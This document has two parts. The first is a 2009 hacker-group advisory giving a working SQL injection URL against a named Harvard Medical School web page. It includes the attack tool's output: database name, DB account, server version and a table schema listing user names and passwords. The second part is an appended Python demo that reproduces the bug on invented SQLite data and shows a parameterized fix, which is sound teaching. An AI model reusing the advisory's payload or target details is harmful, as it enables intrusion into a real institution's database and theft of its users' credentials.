┌───────────────────────────────────────────────────────────────────────────┐
│  C r a C k E r   -   T H E   C R A C K   O F   E T E R N A L   M I G H T  │
└───────────────────────────────────────────────────────────────────────────┘
       From The Ashes and Dust Rises An Unimaginable crack....
┌───────────────────────────────────────────────────────────────────────────┐
│  [ EZINE ]                                                                │
└───────────────────────────────────────────────────────────────────────────┘

  Author    : CraCkEr
  Website   : harvard.edu
  Vuln Type : Remote SQL Injection
  Method    : GET
  Critical  : High [░░▒▒▓▓██]
  Impact    : Database access
  Note      : Famous sites can also be vulnerable
  Contact   : DALnet #crackers

  Release Notes:
  ═════════════
  "High" is the rating used for remotely exploitable vulnerabilities that can
  lead to system compromise.

┌───────────────────────────────────────────────────────────────────────────┐
│  Exploit URL's                                                            │
└───────────────────────────────────────────────────────────────────────────┘

  [+] Remote SQL Injection (catid parameter, GET):
      http://microfluidics.hms.harvard.edu/index.php?catid=-1 union select 1,database(),3--

  [+] Attack Results
  [+] URL: http://microfluidics.hms.harvard.edu/index.php?catid=-1+union+select+1,Attack,3--
  [+] Evasion Used: "+" "--"
  [+] 05:33:35
  [+] Gathering MySQL Server Configuration...
      Database: MICROFLUIDICS
      User:     MICROFLDCSWEB@CORNET.CL.MED.HARVARD.EDU
      Version:  5.0.45-DEBIAN_1~BPO.1-LOG
  [+] Showing Tables & Columns from database "MICROFLUIDICS"
  [+] Number of Tables: 11

  [Database]: MICROFLUIDICS
  [Table: Columns]
  [0]  HMS_CONTENT_LEAF:  NID,TABLE_NAME
  [1]  HMS_EQUIPMENT:     ID,NAME,IMAGE_PATH1,IMAGE_PATH2,IMAGE_PATH3,IMAGE_PATH4,PDF_PATH1,PDF_NAME1,PDF_PATH2,PDF_NAME2,PDF_PATH3,PDF_NAME3,PDF_PATH4,PDF_NAME4,DESC_LONG,USE_TYPE,MAX_USERS,MAX_HOURS,MIN_HOURS,MIN_USER_STATUS
  [2]  HMS_EVENTS:        ID,DATE_TIME,NAME,HOST,LOCATION,NUM_SLOTS,DESC_LONG
  [3]  HMS_FEATURES:      ID,IMG_PATH,TITLE,CAPTION,LINK,PAUSE
  [4]  HMS_REGS:          EID,UID
  [5]  HMS_RESERVATIONS:  UID,EID,START,END,VERIFIED
  [6]  HMS_SEMINARS:      ID,DATE_TIME,NAME,HOST,DESC_LONG,LOCATION
  [7]  HMS_SESSIONS:      SESSION_ID,SESSION_DATA,EXPIRES
  [8]  HMS_SITE_CONTENT:  ID,CATID,LINK_NAME,TITLE,DESC_LONG,EDIT_TYPE,IS_TOP_PAGE
  [9]  HMS_SITE_SECTIONS: ID,LABEL,RANK,PUBLIC
  [10] HMS_USERS:         ID,USERNAME,PASSWORD,NAME_FIRST,NAME_LAST,TITLE,AFFILIATION,DEPARTMENT,LAB,PHONE,FAX,ADDRESS,EMAIL,HMS_STATUS,BILLING_CODE,HUID,HUID_EXP,FINANCE_NAME_FIRST,FINANCE_NAME_LAST,FINANCE_PHONE,FINANCE_EMAIL,AGREEMENT_STATUS,APPROVAL_STATUS,ACTIVE_STATUS

  [-] [05:35:30]
  [-] Total URL Requests 89
  [-] Done
└────────────────────────────────────────────────────────────────────────────┘

  Greets: The_PitBull, Raz0r, iNs, Sad, His0k4, Hussin X, Mr. SQL

┌───────────────────────────────────────────────────────────────────────────┐
│  © CraCkEr 2009                                                           │
└───────────────────────────────────────────────────────────────────────────┘
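The root cause behind the URL above is a numeric GET parameter (`catid`) being concatenated straight into a three-column SELECT, which is what lets a `-1 union select 1,database(),3--` payload replace the page content with the database name. The following is an added example, not code from the advisory or from the affected site: it reproduces that bug pattern against a constructed in-memory SQLite table (loosely named after the HMS_SITE_CONTENT columns in the dump, with invented rows) and puts the hardened handler beside it. Because SQLite has no `database()` function, the payload here calls `sqlite_version()` instead; the `make_db`, `vulnerable_lookup` and `safe_lookup` names are this example's own.

```python
import re
import sqlite3

# Same shape as the advisory's payload, with sqlite_version() standing in
# for MySQL's database(). The trailing "--" comments out whatever follows.
PAYLOAD = "-1 union select 1,sqlite_version(),3--"

# Only a plain optionally-signed integer is acceptable for catid. A regex is
# used rather than int() alone because int() also accepts "1_0" and padding
# whitespace, which a log-based detector would otherwise never see.
_INT_RE = re.compile(r"-?\d+")


def make_db():
    """Constructed stand-in for the site's content table (invented data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE hms_site_content ("
        "id INTEGER, catid INTEGER, link_name TEXT, title TEXT)"
    )
    conn.executemany(
        "INSERT INTO hms_site_content VALUES (?, ?, ?, ?)",
        [
            (1, 1, "home", "Home"),
            (2, 1, "equipment", "Equipment"),
            (3, 2, "seminars", "Seminars"),
        ],
    )
    return conn


def vulnerable_lookup(conn, catid):
    """The pattern the advisory exploits: the raw GET value is pasted into SQL.

    The query has three columns, which is why the injected SELECT must also
    supply exactly three (1, <expression>, 3) for the UNION to succeed.
    """
    sql = (
        "SELECT id, link_name, title FROM hms_site_content "
        f"WHERE catid={catid}"
    )
    return conn.execute(sql).fetchall()


def safe_lookup(conn, catid):
    """Hardened form: validate the shape, then bind the value as a parameter.

    Returns [] for anything that is not a plain integer, so the injected
    text never reaches the SQL parser at all.
    """
    if not isinstance(catid, str) or not _INT_RE.fullmatch(catid):
        return []
    sql = "SELECT id, link_name, title FROM hms_site_content WHERE catid=?"
    return conn.execute(sql, (int(catid),)).fetchall()


def sqlite_version_string():
    """Expose the library version so callers can recognise a leaked value."""
    return sqlite3.sqlite_version


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, catid=1     :", vulnerable_lookup(db, "1"))
    print("vulnerable, catid=payload:", vulnerable_lookup(db, PAYLOAD))
    print("safe, catid=1           :", safe_lookup(db, "1"))
    print("safe, catid=payload     :", safe_lookup(db, PAYLOAD))
```

Running it shows the vulnerable handler returning a single row whose middle column is the server version string (the same trick the advisory uses to read `database()`), while the hardened handler returns nothing for the payload and the normal rows for `catid=1`. The two defences are independent: parameter binding alone would already stop the UNION, and the integer check additionally keeps junk input out of the application's error and log paths.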